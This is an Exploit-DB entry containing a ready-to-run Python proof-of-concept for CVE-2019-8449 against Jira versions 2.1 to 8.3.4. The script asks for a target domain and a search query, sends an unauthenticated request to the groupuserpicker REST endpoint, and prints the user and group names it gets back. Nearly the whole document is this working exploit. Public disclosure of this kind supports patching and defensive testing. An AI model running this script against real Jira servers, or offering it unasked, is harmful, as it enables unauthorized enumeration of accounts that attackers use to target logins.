Jira 8.3.4 - Information Disclosure (Username Enumeration)

EDB-ID:

47990




Platform:

Java

Date:

2020-02-03


# Exploit Title: Jira 8.3.4 - Information Disclosure (Username Enumeration)
# Date: 2019-09-11
# Exploit Author: Mufeed VH
# Vendor Homepage: https://www.atlassian.com/
# Software Link: https://www.atlassian.com/software/jira
# Version: 8.3.4
# Tested on: Pop!_OS 19.10
# CVE : CVE-2019-8449

# CVE-2019-8449 Exploit for Jira v2.1 - v8.3.4
# DETAILS :: https://www.cvedetails.com/cve/CVE-2019-8449/
# CONFIRM :: https://jira.atlassian.com/browse/JRASERVER-69796

#!/usr/bin/env python


__author__  = "Mufeed VH (@mufeedvh)"

import os
import requests


class CVE_2019_8449:
    def ask_for_domain(self):
        domain = raw_input("[>] Enter the domain of Jira instance: => ")
        if domain == "":
            print("\n[-] ERROR: domain is required\n")
            self.ask_for_domain()
        self.url = "https://{}/rest/api/latest/groupuserpicker".format(domain)

    def ask_for_query(self):
        self.query = raw_input("[>] Enter search query: [required] (Example: admin) => ")
        if self.query == "":
            print("\n[-] ERROR: The query parameter is required\n")
            self.ask_for_query()    

    def exploit(self):
        self.ask_for_domain()
        self.ask_for_query()

        maxResults = raw_input("\n[>] Enter the number of maximum results to fetch: (50) => ")
        showAvatar = raw_input("\n[>] Enter 'true' or 'false' whether to show Avatar of the user or not: (false) => ")
        fieldId = raw_input("\n[>] Enter the fieldId to fetch: => ")
        projectId = raw_input("\n[>] Enter the projectId to fetch: => ")
        issueTypeId = raw_input("\n[>] Enter the issueTypeId to fetch: => ")
        avatarSize = raw_input("\n[>] Enter the size of Avatar to fetch: (xsmall) => ")
        caseInsensitive = raw_input("\n[>] Enter 'true' or 'false' whether to show results case insensitive or not: (false) => ")
        excludeConnectAddons = raw_input("\n[>] Indicates whether Connect app users and groups should be excluded from the search results. If an invalid value is provided, the default value is used: (false) => ")    

        params = {
            'query': self.query, 
            'maxResults': maxResults, 
            'showAvatar': showAvatar, 
            'fieldId': fieldId, 
            'projectId': projectId, 
            'issueTypeId': issueTypeId, 
            'avatarSize': avatarSize, 
            'caseInsensitive': caseInsensitive, 
            'excludeConnectAddons': excludeConnectAddons
        }

        send_it = requests.get(url = self.url, params = params)

        try:
            response = send_it.json()
        except:
            print("\n[-] ERROR: Something went wrong, the request didn't respond with a JSON result.")
            print("[-] INFO: It is likely that the domain you've entered is wrong or this Jira instance is not exploitable.")
            print("[-] INFO: Try visting the target endpoint manually ({}) and confirm the endpoint is accessible.".format(self.url))
            quit()
        
        print("\n<========== RESPONSE ==========>\n")
        print(response)
        print("\n<==============================>\n")

if __name__ == '__main__':
    os.system('cls' if os.name == 'nt' else 'clear')
    
    print('''
        ================================================
        |                                              |
        | CVE-2019-8449 Exploit for Jira v2.1 - v8.3.4 |
        |  Proof of Concept By: Mufeed VH [@mufeedvh]  |
        |                                              |
        ================================================
    ''')

    CVE_2019_8449().exploit()